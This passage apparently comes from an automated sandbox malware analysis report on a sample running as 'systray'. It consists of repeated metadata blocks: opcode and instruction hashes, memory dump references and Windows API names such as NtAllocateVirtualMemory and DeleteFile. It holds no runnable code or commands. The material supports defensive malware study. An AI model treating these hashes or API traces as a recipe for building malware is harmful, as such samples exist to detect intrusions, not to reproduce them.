                                                                  • Opcode Fuzzy Hash: 05858e37e9e395ee33a9100e9f77f8ce24fca5febf1eff79fb2164b31e51fba1
                                                                  • Instruction Fuzzy Hash: 053103B5A01248AFDB14DF98C981EEFB7B9EF88304F10811AFD19A7344D730A911CBA1
                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00AC1EDE,?,A8038694,00000000,00000004,00003000,?,?,?,?,?,00AD80FE,00AC1EDE), ref: 00AD983B
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 909f26f72666e9c96faafb94517615e42aeeb3c8665ab52f61d84f80faea3ca5
                                                                  • Instruction ID: d78ef683b5be9ddbbec20dc68d8e22c8d42eb16e8a0c042197192d39ff5821ab
                                                                  • Opcode Fuzzy Hash: 909f26f72666e9c96faafb94517615e42aeeb3c8665ab52f61d84f80faea3ca5
                                                                  • Instruction Fuzzy Hash: 142123B5A11648AFDB10DF98CC41EEFB7B9EF88300F00410AF919AB240D770A921CBA1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: d131b7222b09d0d7006da3ee4aef3fe179894c2b8ff4099b04f06208ec93d2fe
                                                                  • Instruction ID: 05fe36d6cf32c9e48f74fa8553305ba5fe43c611c423715fe3d8684f7626fedc
                                                                  • Opcode Fuzzy Hash: d131b7222b09d0d7006da3ee4aef3fe179894c2b8ff4099b04f06208ec93d2fe
                                                                  • Instruction Fuzzy Hash: 2011A0716117087FE720EB58CD02FEBB3ADEF85714F004109FA09A7281DB716A1587A1
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AD9644
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction ID: 6a80b2dbd884122c8373e2846df4ae8dd0074ae568291d612624995e461c79da
                                                                  • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction Fuzzy Hash: D3E046362106847FC220AA59DC51FDB776DEBC5760F404419FA08A7242C6B1BA158BE4
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3a05a16d44ccfc3f73a2aafd50100e89731f6f14eb73443af73e50788d8ef7ba
                                                                  • Instruction ID: 700f4e7e27f7193b0f395fe97759fe46da374ec1f7add39a2a05eeffdf3c98c4
                                                                  • Opcode Fuzzy Hash: 3a05a16d44ccfc3f73a2aafd50100e89731f6f14eb73443af73e50788d8ef7ba
                                                                  • Instruction Fuzzy Hash: F3900262601510526140715849054066005DBE2305395C355A0595561C8A18D9569269
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a3abd863fa02085c32f0654c03b993c3f2d20a5bb7b1b1bf7284ac065a4f6bf0
                                                                  • Instruction ID: 3a239a7ac3988daa93b1902e16f9130a778c958b69a87ac7b61aa5974350ea53
                                                                  • Opcode Fuzzy Hash: a3abd863fa02085c32f0654c03b993c3f2d20a5bb7b1b1bf7284ac065a4f6bf0
                                                                  • Instruction Fuzzy Hash: 0C90023260581022B140715849855464005DBE1305B55C251E0465555C8E14DA575361
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b860d737b0c96121819ce67a8e549f160054bc50c9017446efe2651d45e79302
                                                                  • Instruction ID: b2ec0b9b120ee61aafa409239846183b8f5b358d9014a37fb5864faf0f139073
                                                                  • Opcode Fuzzy Hash: b860d737b0c96121819ce67a8e549f160054bc50c9017446efe2651d45e79302
                                                                  • Instruction Fuzzy Hash: A790023220141412F100759855096460005CBE1305F55D251A5065556ECA65D9926131
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b42510eaecbe186a0a53264eb5bece987831d03be2e14d16cf0d9b5019d70c9e
                                                                  • Instruction ID: 2a1faede83074b15ac07ca767620e29ee411774c8a6cabca61607078d8963fe6
                                                                  • Opcode Fuzzy Hash: b42510eaecbe186a0a53264eb5bece987831d03be2e14d16cf0d9b5019d70c9e
                                                                  • Instruction Fuzzy Hash: 2B90023220149812F1107158850574A0005CBD1305F59C651A4465659D8A95D9927121
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 16edf9c6e432a7cd38730dcb94171a7f7fc0161d16694f4fd5139c6a995dfe1d
                                                                  • Instruction ID: ed808a2003e88bbe0d98bded04c741c09fadb94f5448ee75c22b08fa28a0d565
                                                                  • Opcode Fuzzy Hash: 16edf9c6e432a7cd38730dcb94171a7f7fc0161d16694f4fd5139c6a995dfe1d
                                                                  • Instruction Fuzzy Hash: 3E90023220141852F10071584505B460005CBE1305F55C256A0165655D8A15D9527521
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6262e1eb1835dc5e03d444b502cc9de398678d33fe27718fcd090f9ada953ef4
                                                                  • Instruction ID: 7438239a24c195992bb2ef88cfee2d6c3bf18a62c7f773738c2b77e243c264d6
                                                                  • Opcode Fuzzy Hash: 6262e1eb1835dc5e03d444b502cc9de398678d33fe27718fcd090f9ada953ef4
                                                                  • Instruction Fuzzy Hash: 2290023220141423F111715846057070009CBD1245F95C652A0465559D9A56DA53A121
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 255c8e10242f839eedd4b61af1a1633cfbd10302ff45cc0600cd0716cceb1d9a
                                                                  • Instruction ID: 8ced21c3cf34158cb89771a1199dd417116b43e3db70b4373a0f2f19d7e3221e
                                                                  • Opcode Fuzzy Hash: 255c8e10242f839eedd4b61af1a1633cfbd10302ff45cc0600cd0716cceb1d9a
                                                                  • Instruction Fuzzy Hash: 95900222242451627545B15845055074006DBE1245795C252A1455951C8926E957D621
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 951497c141d5550384623ca93dfcc920fce28f756dede4cc47ca5d6fb0b21b39
                                                                  • Instruction ID: d6319f6986f0d8e577aa199c9fd307e155b1cc2857befe7174c55fcdbc59d7d7
                                                                  • Opcode Fuzzy Hash: 951497c141d5550384623ca93dfcc920fce28f756dede4cc47ca5d6fb0b21b39
                                                                  • Instruction Fuzzy Hash: 5C90022230141013F140715855196064005DBE2305F55D251E0455555CDD15D9575222
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: edb2d18b289ae1d4364a491d23dad7e850410317aead10872eed9631ac73ca2b
                                                                  • Instruction ID: d29f4c995c1e3004d465c3d0c951947ce36153a21e68f518c8b48bff6f7e81f4
                                                                  • Opcode Fuzzy Hash: edb2d18b289ae1d4364a491d23dad7e850410317aead10872eed9631ac73ca2b
                                                                  • Instruction Fuzzy Hash: 4990022A21341012F1807158550960A0005CBD2206F95D655A0056559CCD15D96A5321
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3127f8727da512f4043463699c5d8417b1ad3cf0f6ce43b163e2b662ecd4b637
                                                                  • Instruction ID: df0ef1a6c84247c173f5d2e3f38d900a919b93280a181886c7ece1464ce146e1
                                                                  • Opcode Fuzzy Hash: 3127f8727da512f4043463699c5d8417b1ad3cf0f6ce43b163e2b662ecd4b637
                                                                  • Instruction Fuzzy Hash: 4D90022260141512F10171584505616000ACBD1245F95C262A1065556ECE25DA93A131
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a3035068d851c955526f640d1fbacad6d4ca15e168b57a1365fe957d3a7b5946
                                                                  • Instruction ID: 267a05608971b98c326a8fff904092c98e30d7d7ab90e390a21006f29b559916
                                                                  • Opcode Fuzzy Hash: a3035068d851c955526f640d1fbacad6d4ca15e168b57a1365fe957d3a7b5946
                                                                  • Instruction Fuzzy Hash: E790026220181413F140755849056070005CBD1306F55C251A20A5556E8E29DD526135
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 338dfe9be1e426162d6fda59cf6e0187bc2e4eb0bdfb50557a17abeff60c18aa
                                                                  • Instruction ID: c2afc6e1c6bf779841e135ed72ee0e9f9a2ea9331c6894d1b011b9083463e848
                                                                  • Opcode Fuzzy Hash: 338dfe9be1e426162d6fda59cf6e0187bc2e4eb0bdfb50557a17abeff60c18aa
                                                                  • Instruction Fuzzy Hash: E2900222601410526140716889459064005EFE2215755C361A09D9551D8959D9665665
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1594b8e3f9aa27cd8cb5a07c877ffddafdbaf49f00afd64ebbd801800b0f2e13
                                                                  • Instruction ID: 98c34a9f828fa1b3256f7548e91621d456d955fea58bf7f340736c885a370f5b
                                                                  • Opcode Fuzzy Hash: 1594b8e3f9aa27cd8cb5a07c877ffddafdbaf49f00afd64ebbd801800b0f2e13
                                                                  • Instruction Fuzzy Hash: 1F900222211C1052F20075684D15B070005CBD1307F55C355A0195555CCD15D9625521
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f3d494795a52b7bc256df032bcadee6fec81aafbc6856820193e0738a6954f5a
                                                                  • Instruction ID: 664774356fb00f3a8d85d08db5de969cc5e3066347a32f06da9503607f344b84
                                                                  • Opcode Fuzzy Hash: f3d494795a52b7bc256df032bcadee6fec81aafbc6856820193e0738a6954f5a
                                                                  • Instruction Fuzzy Hash: C890026234141452F10071584515B060005CBE2305F55C255E10A5555D8A19DD536126
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2e322c506a70fc3c8692c91f998628ec40dc17ab9ada6cad29a09e93f6722d2f
                                                                  • Instruction ID: c09c1bd8db7d8c70e3cfd16e242cfd89ceb47e4844c7cf3f56c7a41d3102301b
                                                                  • Opcode Fuzzy Hash: 2e322c506a70fc3c8692c91f998628ec40dc17ab9ada6cad29a09e93f6722d2f
                                                                  • Instruction Fuzzy Hash: F9900226221410122145B558070550B0445DBD7355395C255F1457591CCA21D9665321
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 86ca813ae87609993b60a4b75da521f978c6cd0d94e3fda6458be527a657b893
                                                                  • Instruction ID: 751871e332f7169ae70df6d40ebd02a3dc3f6f20541c30572c7ce99bc3b31ecb
                                                                  • Opcode Fuzzy Hash: 86ca813ae87609993b60a4b75da521f978c6cd0d94e3fda6458be527a657b893
                                                                  • Instruction Fuzzy Hash: EA900226211410132105B55807055070046CBD6355355C261F1056551CDA21D9625121
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 228425b62c773a6de58e4cff8d11d0554a4f8fd1e04212620ebb869a7991bad4
                                                                  • Instruction ID: 6e7f4da75d16ab00794505b9b92fe5a3790d229a936e60f7aef47703a2b57547
                                                                  • Opcode Fuzzy Hash: 228425b62c773a6de58e4cff8d11d0554a4f8fd1e04212620ebb869a7991bad4
                                                                  • Instruction Fuzzy Hash: 9990023260541812F150715845157460005CBD1305F55C251A0065655D8B55DB5676A1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a6639eb57a1e2210cf491148341cf97d7c5d54ac89e05cde04bd450bdc375d0b
                                                                  • Instruction ID: 488453763ff496acddfee7170105b8b4b4d06d6b4d79da64019fbaaaf9bce74d
                                                                  • Opcode Fuzzy Hash: a6639eb57a1e2210cf491148341cf97d7c5d54ac89e05cde04bd450bdc375d0b
                                                                  • Instruction Fuzzy Hash: 1D90023220141812F1807158450564A0005CBD2305F95C255A0066655DCE15DB5A77A1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5ed583c8e8d322318a7ef02ec019215238f2e8eba3d8479bfeae2a6c9e33bd9a
                                                                  • Instruction ID: 38e53cfd495b592efa77e6bdc3a1ce980c9eea2f519d3082d9c83ef3114a0f17
                                                                  • Opcode Fuzzy Hash: 5ed583c8e8d322318a7ef02ec019215238f2e8eba3d8479bfeae2a6c9e33bd9a
                                                                  • Instruction Fuzzy Hash: 8C90023220545852F14071584505A460015CBD1309F55C251A00A5695D9A25DE56B661
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 534e583c791b5faffbf8d7e943e8c6db02cfb32259ae25abf5c4d4e598247ba9
                                                                  • Instruction ID: 437970a43fe1792f999e38b6c3922556f9980ab0a84ae486d881547ed4d62711
                                                                  • Opcode Fuzzy Hash: 534e583c791b5faffbf8d7e943e8c6db02cfb32259ae25abf5c4d4e598247ba9
                                                                  • Instruction Fuzzy Hash: D790026220241013610571584515616400ACBE1205B55C261E1055591DC925D9926125
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3d970dac0aa27ea19b6f2b5de6d88c855b0d1678aa37483eed48fe65d5e317ec
                                                                  • Instruction ID: 042cd399dd1ca98ea6a084e54f52c8e2b375998b4d0240177aa1efe8f7f829d7
                                                                  • Opcode Fuzzy Hash: 3d970dac0aa27ea19b6f2b5de6d88c855b0d1678aa37483eed48fe65d5e317ec
                                                                  • Instruction Fuzzy Hash: 5390023260551412F100715846157061005CBD1205F65C651A0465569D8B95DA5265A2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 490da627e748a9750414c6b90dd52b2af185088a062f9d8a536850bfdecb2728
                                                                  • Instruction ID: 0327645f942917626037522258ef14eb4420b73851b8bde4fd9668381cb5b5ff
